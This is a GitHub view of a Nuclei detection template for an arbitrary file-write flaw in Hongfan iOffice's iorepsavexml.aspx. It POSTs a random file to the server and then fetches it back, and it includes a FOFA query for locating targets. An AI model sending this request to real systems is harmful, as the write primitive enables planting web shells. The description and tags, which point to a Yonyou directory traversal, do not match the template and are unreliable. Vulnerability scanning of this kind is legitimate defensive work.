-
Notifications
You must be signed in to change notification settings - Fork 1
/
hongfan-iorepsavexml-fileupload.yaml
40 lines (33 loc) · 1.09 KB
/
hongfan-iorepsavexml-fileupload.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: hongfan-iorepsavexml-fileupload
info:
name: Hongfan - File Upload
author: Co5mos
severity: high
description: There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UF FE Collaboration Office Platform.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
fofa-query: "FE协作"
tags: yonyou,lfi
variables:
filename: "{{rand_base(5)}}.txt"
rand_str: "{{randstr}}"
http:
- method: POST
path:
- "/iOffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename={{filename}}&filepath=/upfiles/rep/pic/"
body: |
"{{rand_str}}"
- method: GET
path:
- "/iOffice/upfiles/rep/pic/{{filename}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "{{rand_str}}"